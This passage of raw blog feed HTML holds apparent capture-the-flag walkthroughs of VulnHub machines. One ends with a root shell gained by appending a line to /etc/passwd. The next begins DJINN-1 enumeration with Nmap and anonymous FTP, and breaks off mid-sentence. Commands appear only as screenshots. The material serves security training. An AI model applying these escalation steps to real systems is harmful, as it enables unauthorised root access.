/&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Inserting the corresponding line at the bottom of &lt;b&gt;/etc/passwd&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRadYs6scI0vtSrm3r3c-srdrGofbeF6GXxGFscS6XkbSrdNfIOUPuUkidDYXSGG9uOfCf3wZYXvwwDqLC4KyyqYRBh0IQ0U9sCjErQjdspohcOwnBW4LZ4feYOM4CZHLJ9lqisn7qfwhp/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;33&quot; data-original-width=&quot;690&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRadYs6scI0vtSrm3r3c-srdrGofbeF6GXxGFscS6XkbSrdNfIOUPuUkidDYXSGG9uOfCf3wZYXvwwDqLC4KyyqYRBh0IQ0U9sCjErQjdspohcOwnBW4LZ4feYOM4CZHLJ9lqisn7qfwhp/s16000/screenshot.42.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixCuKxCV9QZyImefhffe5GEUuq8f7K3Rd3Vi5nSSm8svaDhbYrk44oftHHH1McZG1mKahLawJNuvUym0n9yipl1P4S9IOXq7oQOXMTNez8HXzl8apj3ZuEnhnYAQr3xIfHwaoLwh4_ce2W/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;29&quot; data-original-width=&quot;800&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixCuKxCV9QZyImefhffe5GEUuq8f7K3Rd3Vi5nSSm8svaDhbYrk44oftHHH1McZG1mKahLawJNuvUym0n9yipl1P4S9IOXq7oQOXMTNez8HXzl8apj3ZuEnhnYAQr3xIfHwaoLwh4_ce2W/s16000/screenshot.43.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finally, switching to user &lt;b&gt;whitelist&lt;/b&gt; we have a root shell:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTA5waSf8-Zka-KkZa33LOhkkajU8NzahN3weMeb0iYowtLN2DNA_JibAoKVqUkhLExmgqHZ-yj7M-dmN3BAdJ0dr2OJXilSU0xZZ6-x0PW2_EvyIL74s1JsMhTd3YNE41ot2DxZsWjnwM/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;95&quot; data-original-width=&quot;530&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTA5waSf8-Zka-KkZa33LOhkkajU8NzahN3weMeb0iYowtLN2DNA_JibAoKVqUkhLExmgqHZ-yj7M-dmN3BAdJ0dr2OJXilSU0xZZ6-x0PW2_EvyIL74s1JsMhTd3YNE41ot2DxZsWjnwM/s16000/screenshot.44.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;6 - CAPTURING THE 2nd FLAG&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;proof.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM9hl4gDD_a-GSjC_4zgMAMkitSd8uprdr2rISfAoxVjbJ1cbLyMwmlw36G0RmGrMlhR7aQurpCRin1055XA2JoKeQBuYLVq7LYQKVWN2aYurGhQEJbdwHbuptdIyUbQ_sRgyZVbaJ1K9f/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;114&quot; data-original-width=&quot;772&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM9hl4gDD_a-GSjC_4zgMAMkitSd8uprdr2rISfAoxVjbJ1cbLyMwmlw36G0RmGrMlhR7aQurpCRin1055XA2JoKeQBuYLVq7LYQKVWN2aYurGhQEJbdwHbuptdIyUbQ_sRgyZVbaJ1K9f/s16000/screenshot.46.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/8898639427119010761'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/8898639427119010761'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2021/11/bravery.html' title='Development'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyAr_DmIzyjereb17NOqZXQs1cfKj0cwCHrB1eKSbF-VUM3lrUf00SKm9qb5x_oNJhihHaXMdFj6gpKdZ6_aOqGbGuKrzXgewAJfVj5L3Bn3ySJKWeW60C8G7HaWWF2e25PNJ_t0AFdc07/s72-c/screenshot.49.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-4429076541474002376</id><published>2021-11-10T08:45:00.130-06:00</published><updated>2021-12-15T11:12:43.339-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>DJINN-1</title><content type='html'>&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;DJINN-1&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk0zZB9ARJD00Hifk44vf4XtSXNEDML9C5pRY8zfGdvbOo5bc0UehKqRZdffXPzRblkaoD93ruQ35z5Gy1iVHaEJqreLKgezwi8HtvDjgeXGQRLgVgtXYVcyuww0K1Bz754drcUN2DncZG/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;197&quot; data-original-width=&quot;609&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk0zZB9ARJD00Hifk44vf4XtSXNEDML9C5pRY8zfGdvbOo5bc0UehKqRZdffXPzRblkaoD93ruQ35z5Gy1iVHaEJqreLKgezwi8HtvDjgeXGQRLgVgtXYVcyuww0K1Bz754drcUN2DncZG/s16000/screenshot.78.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc;&quot;&gt;1 - INTRODUCTION&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp;&lt;span style=&quot;background-color: white;&quot;&gt;The goal of this exercise is to develop a hacking process for the vulnerable machine DJINN-1 from the VulnHub pentesting platform.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- DJINN-1 can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/djinn-1,397/&quot;&gt;https://www.vulnhub.com/entry/djinn-1,397/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once downloaded DJINN-1 and extracted with VirtualBox:&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjgYufnw6DKZXINw4_FCJeFofAnwifBjJHBZogl9146WzcIC346FNbTf4dwhk9toz5KGoazc86x-0DkevojBYR45SObRLX6NcUFjv552X1JMWgQ-5VLbxDsTld0uTZGKrb6ro8guseTw3a78ru8JtrfgulNmMlqSvZuO1nfRSyxSYjDFg_UHRMgDJilUQ=s338&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;338&quot; data-original-width=&quot;293&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjgYufnw6DKZXINw4_FCJeFofAnwifBjJHBZogl9146WzcIC346FNbTf4dwhk9toz5KGoazc86x-0DkevojBYR45SObRLX6NcUFjv552X1JMWgQ-5VLbxDsTld0uTZGKrb6ro8guseTw3a78ru8JtrfgulNmMlqSvZuO1nfRSyxSYjDFg_UHRMgDJilUQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap we learn that&amp;nbsp; ports 21, 1337, 7331 are open:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg6u6qdZ_HO7B0c-j1t3phNmIE_QUipKd2OPKb1OAfgrXfGRgpnaM5PCzEeHmnUbvLn_JPmuQ7VDT8TNWWi8TKDl56TMm0HjGrsyYVKhqK_S1vLjsrLaipaigTygEVe-uXMjXwgPqrrGP8ytCxEEz-h7WcevZmAk4cFLXbLzZd_YXzfF31GBIjtk41fQQ=s438&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;239&quot; data-original-width=&quot;438&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg6u6qdZ_HO7B0c-j1t3phNmIE_QUipKd2OPKb1OAfgrXfGRgpnaM5PCzEeHmnUbvLn_JPmuQ7VDT8TNWWi8TKDl56TMm0HjGrsyYVKhqK_S1vLjsrLaipaigTygEVe-uXMjXwgPqrrGP8ytCxEEz-h7WcevZmAk4cFLXbLzZd_YXzfF31GBIjtk41fQQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- FTP allows Anonymous login. Also, there are 3 text files available:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiqe3qsc4OkTV0rkKNoMphXPSeOjedZLCo_1xlIz0wldUrRe4BuARt1y8UG1bjBVQOQu6EQUypDVVYLv8kQVOsqgcEpuTJQcsOrB8CxLf19OgAZA0LpOwvN6tlV73x3N1S1YOdbGHYNoHLysFwbIV-x5tGDI--DcJs_RKBrgw2tsZQth0F8kEAQ924Q5g=s765&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;605&quot; data-original-width=&quot;765&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiqe3qsc4OkTV0rkKNoMphXPSeOjedZLCo_1xlIz0wldUrRe4BuARt1y8UG1bjBVQOQu6EQUypDVVYLv8kQVOsqgcEpuTJQcsOrB8CxLf19OgAZA0LpOwvN6tlV73x3N1S1YOdbGHYNoHLysFwbIV-x5tGDI--DcJs_RKBrgw2tsZQth0F8kEAQ924Q5g=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Port 1337 holds a math game:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhgioZmyzPpBlh_CgZf6nSZpAawR2mpJzdR8fQV_cRQaJnumOiLySaluJkJFnbGINESEY7Nd0M-bz2pws2QhtT7xJ3NxXATkpYfH0sLE_E9Olt7wnmj-LbDYhODGjHb2RAxpaiuRkPbp7AaRLjfz-_4405G7mJflaPBRP2wpxtLaofWvCBHZAWL6oLdog=s861&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;695&quot; data-original-width=&quot;861&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhgioZmyzPpBlh_CgZf6nSZpAawR2mpJzdR8fQV_cRQaJnumOiLySaluJkJFnbGINESEY7Nd0M-bz2pws2QhtT7xJ3NxXATkpYfH0sLE_E9Olt7wnmj-LbDYhODGjHb2RAxpaiuRkPbp7AaRLjfz-_4405G7mJflaPBRP2wpxtLaofWvCBHZAWL6oLdog=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Port 7331 runs a web server:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhgWIuizJmrihbvypt0sJywfgfvFnX-yBMKH_0ntgNpiz7_x-G3k6u6FsPODL8h-VlcYoo5ZzxdQpVSQDe2-ZIwtlEoipGhS6QE6wkOFlEzO_cNFEeKrQc68VjzDU-aAU_wHIOP3lo7nb9cBj7QgUFLXizLbtzQr9p9terG6sUjWM1-tqTuXPuZOTc6XQ=s713&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;224&quot; data-original-width=&quot;713&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhgWIuizJmrihbvypt0sJywfgfvFnX-yBMKH_0ntgNpiz7_x-G3k6u6FsPODL8h-VlcYoo5ZzxdQpVSQDe2-ZIwtlEoipGhS6QE6wkOFlEzO_cNFEeKrQc68VjzDU-aAU_wHIOP3lo7nb9cBj7QgUFLXizLbtzQr9p9terG6sUjWM1-tqTuXPuZOTc6XQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting to FTP server we find the 3 text files:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhtrsi0QHY4XgX1lDllBbwx_B5Ot8cXXZHby1Irw7bgf72LnLDasBILU8UoPjAYIfRFAcgmAu8IjjxnHTl4SluiIt5NbK0b80m4cY3Ir_S1G__zGEDR9LTplQ6_KmF9lYTMKhoz2TcmvKIFcedDW_3gjSdY5vDk5XFvNpdVT4f3mFEI9HMUWDX59Mat4A=s805&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;462&quot; data-original-width=&quot;805&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhtrsi0QHY4XgX1lDllBbwx_B5Ot8cXXZHby1Irw7bgf72LnLDasBILU8UoPjAYIfRFAcgmAu8IjjxnHTl4SluiIt5NbK0b80m4cY3Ir_S1G__zGEDR9LTplQ6_KmF9lYTMKhoz2TcmvKIFcedDW_3gjSdY5vDk5XFvNpdVT4f3mFEI9HMUWDX59Mat4A=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiHhcm6ILxCkxGDyIKH4VDAN6ooNhpT_kNtFrUOqfuJaCkE9HOY0cOYMeOgT24RkBzqM2nwjHie0MfweEwMQ-La-g-4ZSkP0jrkzuP8U5JtM95SnpZnWCqQwq-Q1SOqoEDC8Op_cuCHTyxhgLNeHzUZVRZ7OK_wfdxEfq5Mn4DfOm_jYqstrgPxADNRLA=s776&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;396&quot; data-original-width=&quot;776&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiHhcm6ILxCkxGDyIKH4VDAN6ooNhpT_kNtFrUOqfuJaCkE9HOY0cOYMeOgT24RkBzqM2nwjHie0MfweEwMQ-La-g-4ZSkP0jrkzuP8U5JtM95SnpZnWCqQwq-Q1SOqoEDC8Op_cuCHTyxhgLNeHzUZVRZ7OK_wfdxEfq5Mn4DfOm_jYqstrgPxADNRLA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Getting 